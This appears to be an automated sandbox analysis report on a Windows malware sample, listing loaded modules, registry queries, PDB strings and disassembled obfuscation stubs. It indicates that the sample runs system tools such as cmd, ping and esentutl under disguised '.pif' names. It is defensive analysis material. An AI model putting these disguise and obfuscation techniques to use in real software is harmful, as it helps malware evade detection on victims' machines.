Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: jW3NEKvxH1.exe Static file information: File size 1285120 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2245097882.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000009.00000000.2272956424.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000A.00000000.2294839083.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
Source: Binary string: easinvoker.pdbH source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B2D000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B5E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.000000000282C000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.000000000282E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr

Data Obfuscation

Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: alpha.pif.4.dr Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02D4894C
Source: alpha.pif.4.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D363B0 push 02D3640Bh; ret 0_2_02D36403
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D363AE push 02D3640Bh; ret 0_2_02D36403
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C349 push 8B02D3C1h; ret 0_2_02D3C34E
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5C378 push 02D5C56Eh; ret 0_2_02D5C566
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D36782 push 02D367C6h; ret 0_2_02D367BE
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D36784 push 02D367C6h; ret 0_2_02D367BE
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5C570 push 02D5C56Eh; ret 0_2_02D5C566
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C56C push ecx; mov dword ptr [esp], edx 0_2_02D3C571
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4AADF push 02D4AB18h; ret 0_2_02D4AB10
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48AD8 push 02D48B10h; ret 0_2_02D48B08
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4AAE0 push 02D4AB18h; ret 0_2_02D4AB10
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DA4A50 push eax; ret 0_2_02DA4B20
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3CBEC push 02D3CD72h; ret 0_2_02D3CD6A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4886C push 02D488AEh; ret 0_2_02D488A6
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C9DF push 02D3CD72h; ret 0_2_02D3CD6A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C98F push 02D3CD72h; ret 0_2_02D3CD6A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D46946 push 02D469F3h; ret 0_2_02D469EB
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D46948 push 02D469F3h; ret 0_2_02D469EB
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D42F60 push 02D42FD6h; ret 0_2_02D42FCE
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5D2FC push 02D5D367h; ret 0_2_02D5D35F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3332C push eax; ret 0_2_02D33368
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5D0AC push 02D5D125h; ret 0_2_02D5D11D
